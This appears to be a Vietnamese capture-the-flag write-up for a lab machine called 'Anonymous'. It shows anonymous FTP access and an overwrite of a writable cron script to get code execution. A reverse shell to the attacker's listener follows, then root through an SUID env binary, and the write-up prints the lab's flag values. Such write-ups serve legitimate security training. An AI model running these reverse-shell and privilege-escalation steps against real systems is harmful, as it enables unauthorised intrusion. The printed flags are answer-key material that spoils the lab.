Anonymous
Not the hacking group.
November 4, 2025
•
July 22, 2025
•
Medium
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Service Scanning
$ sudo nmap -sS -sV -sC -T4 -vv 10.10.66.86
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 60 vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.17.21.52
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 60 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCi47ePYjDctfwgAphABwT1jpPkKajXoLvf3bb/zvpvDvXwWKnm6nZuzL2HA1veSQa90ydSSpg8S+B8SLpkFycv7iSy2/Jmf7qY+8oQxWThH1fwBMIO5g/TTtRRta6IPoKaMCle8hnp5pSP5D4saCpSW3E5rKd8qj3oAj6S8TWgE9cBNJbMRtVu1+sKjUy/7ymikcPGAjRSSaFDroF9fmGDQtd61oU5waKqurhZpre70UfOkZGWt6954rwbXthTeEjf+4J5+gIPDLcKzVO7BxkuJgTqk4lE9ZU/5INBXGpgI5r4mZknbEPJKS47XaOvkqm9QWveoOSQgkqdhIPjnhD
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPjHnAlR7sBuoSM2X5sATLllsFrcUNpTS87qXzhMD99aGGzyOlnWmjHGNmm34cWSzOohxhoK2fv9NWwcIQ5A/ng=
| 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDHIuFL9AdcmaAIY7u+aJil1covB44FA632BSQ7sUqap
139/tcp open netbios-ssn syn-ack ttl 60 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 60 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1s, deviation: 1s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64425/tcp): CLEAN (Couldn't connect)
| Check 2 (port 51088/tcp): CLEAN (Couldn't connect)
| Check 3 (port 18791/udp): CLEAN (Failed to receive data)
| Check 4 (port 13356/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ANONYMOUS<00> Flags: <unique><active>
| ANONYMOUS<03> Flags: <unique><active>
| ANONYMOUS<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2025-07-22T02:05:44+00:00
| smb2-time:
| date: 2025-07-22T02:05:43
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)FTP 21
Dựa trên kết quả quét Nmap, chúng ta đã xác định được rằng có thể đăng nhập vào FTP server bằng anonymous login với user ftp mà không cần mật khẩu. Điều quan trọng hơn là thư mục scripts trên FTP có full permission, cho phép chúng ta đọc, ghi và chỉnh sửa file.
┌──(hungnt㉿kali)-[~]
└─$ ftp 10.10.66.86
Connected to 10.10.66.86.
220 NamelessOne's FTP Server!
Name (10.10.66.86:hungnt): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||40426|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||21728|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 1204 Jul 22 02:10 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.Khi liệt kê nội dung trong thư mục scripts, chúng ta tìm thấy 3 file thú vị: clean.sh, removed_files.log, và to_do.txt. Để hiểu rõ hơn vai trò của chúng, chúng ta download cả ba file này về để xem xét nội dung.
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||13712|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
100% |****************************************************************************************************************| 314 6.11 MiB/s 00:00 ETA
226 Transfer complete.
314 bytes received in 00:00 (1.31 KiB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||17238|)
150 Opening BINARY mode data connection for removed_files.log (1204 bytes).
100% |****************************************************************************************************************| 1204 4.25 MiB/s 00:00 ETA
226 Transfer complete.
1204 bytes received in 00:00 (4.96 KiB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||15895|)
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
100% |****************************************************************************************************************| 68 1.32 KiB/s 00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.23 KiB/s)
ftp> exit
221 Goodbye.┌──(hungnt㉿kali)-[~]
└─$ cat clean.sh
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
┌──(hungnt㉿kali)-[~]
└─$ cat removed_files.log
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
┌──(hungnt㉿kali)-[~]
└─$ cat to_do.txt
I really need to disable the anonymous login...it's really not safeĐiểm đáng chú ý là clean.sh có thể ghi đè và chỉnh sửa được trực tiếp từ FTP. Khi phân tích, chúng ta nhận ra script này có vẻ như đang chạy định kỳ trên target. Nó sẽ append chuỗi "Running cleanup script: nothing to delete" vào removed_files.log mỗi khi được thực thi. Điều này mở ra khả năng rằng chúng ta có thể inject các command bất kỳ vào bên trong clean.sh, và chúng sẽ được chạy tự động trên target.
Để kiểm tra giả thuyết, chúng ta đã thử chèn thêm một dòng echo đơn giản để ghi dấu lại:
┌──(hungnt㉿kali)-[~]
└─$ cat clean.sh
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Hacker was here!!!" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fiSau đó, chúng ta upload lại phiên bản đã chỉnh sửa của clean.sh lên FTP server.
ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||63324|)
150 Ok to send data.
100% |****************************************************************************************************************| 290 5.88 MiB/s 00:00 ETA
226 Transfer complete.
290 bytes sent in 00:00 (0.60 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||12882|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 290 Jul 22 02:40 clean.sh
-rw-rw-r-- 1 1000 1000 2494 Jul 22 02:40 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> ls
229 Entering Extended Passive Mode (|||34342|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 290 Jul 22 02:40 clean.sh
-rw-rw-r-- 1 1000 1000 2513 Jul 22 02:41 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||53522|)
150 Opening BINARY mode data connection for removed_files.log (2513 bytes).
100% |****************************************************************************************************************| 2513 46.99 MiB/s 00:00 ETA
226 Transfer complete.
2513 bytes received in 00:00 (10.31 KiB/s)Chờ một thời gian, chúng ta download lại file removed_files.log từ target và kiểm tra nội dung. Quả thật, dòng "Hacker was here!!!" xuất hiện trong log, xác nhận rằng chúng ta đã thực thi thành công code từ xa.
┌──(hungnt㉿kali)-[~]
└─$ cat removed_files.log
Running cleanup script: nothing to delete
...
Running cleanup script: nothing to delete
Hacker was here!!!Như vậy, chúng ta đã đạt được Remote Code Execution (RCE) trên target thông qua việc lợi dụng file clean.sh.
Shell as namelessone
Chúng ta cùng thiết lập một reverse shell connection.
┌──(hungnt㉿kali)-[~]
└─$ cat clean.sh
#!/bin/bash
sh -i >& /dev/tcp/10.17.21.52/4242 0>&1
ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||46377|)
150 Ok to send data.
100% |****************************************************************************************************************| 52 570.57 KiB/s 00:00 ETA
226 Transfer complete.
52 bytes sent in 00:00 (0.10 KiB/s)┌──(hungnt㉿kali)-[~]
└─$ rlwrap -cAr nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.17.21.52] from (UNKNOWN) [10.10.66.86] 59918
sh: 0: can't access tty; job control turned off
$ id
uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)Sau khi kết nối thành công, chúng ta đã truy cập được vào target với quyền của user namelessone.
user.txt
$ cd ~
$ ls -la
total 60
drwxr-xr-x 6 namelessone namelessone 4096 May 14 2020 .
drwxr-xr-x 3 root root 4096 May 11 2020 ..
lrwxrwxrwx 1 root root 9 May 11 2020 .bash_history -> /dev/null
-rw-r--r-- 1 namelessone namelessone 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 namelessone namelessone 3771 Apr 4 2018 .bashrc
drwx------ 2 namelessone namelessone 4096 May 11 2020 .cache
drwx------ 3 namelessone namelessone 4096 May 11 2020 .gnupg
-rw------- 1 namelessone namelessone 36 May 12 2020 .lesshst
drwxrwxr-x 3 namelessone namelessone 4096 May 12 2020 .local
drwxr-xr-x 2 namelessone namelessone 4096 May 17 2020 pics
-rw-r--r-- 1 namelessone namelessone 807 Apr 4 2018 .profile
-rw-rw-r-- 1 namelessone namelessone 66 May 12 2020 .selected_editor
-rw-r--r-- 1 namelessone namelessone 0 May 12 2020 .sudo_as_admin_successful
-rw-r--r-- 1 namelessone namelessone 33 May 11 2020 user.txt
-rw------- 1 namelessone namelessone 7994 May 12 2020 .viminfo
-rw-rw-r-- 1 namelessone namelessone 215 May 13 2020 .wget-hsts
$ cat user.txt
90d6f992585815ff991e68748c414740LinPEAS
Lúc này, chúng ta chuyển LinPEAS sang target và bắt đầu enumerate các vector leo quyền.
Chúng ta phát hiện ra binary env được gán quyền SUID. Đây là một điểm quan trọng, bởi vì việc env có SUID permission bit cho phép chúng ta tận dụng để leo quyền, theo như hướng dẫn được ghi nhận tại đây.
Shell as root
namelessone@anonymous:/tmp$ which env
which env
/usr/bin/env
namelessone@anonymous:/tmp$ /usr/bin/env /bin/sh -p
/usr/bin/env /bin/sh -p
## id
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)Chúng ta đã chiếm quyền root thành công.
root.txt
## ls -la /root
ls -la /root
total 60
drwx------ 6 root root 4096 May 17 2020 .
drwxr-xr-x 24 root root 4096 May 12 2020 ..
lrwxrwxrwx 1 root root 9 May 11 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 May 11 2020 .cache
drwx------ 3 root root 4096 May 11 2020 .gnupg
drwxr-xr-x 3 root root 4096 May 11 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 May 11 2020 root.txt
-rw-r--r-- 1 root root 66 May 11 2020 .selected_editor
drwx------ 2 root root 4096 May 11 2020 .ssh
-rw------- 1 root root 13795 May 17 2020 .viminfo
-rw------- 1 root root 55 May 14 2020 .Xauthority
## cat /root/root.txt
cat /root/root.txt
4d930091c31a622a7ed10f27999af363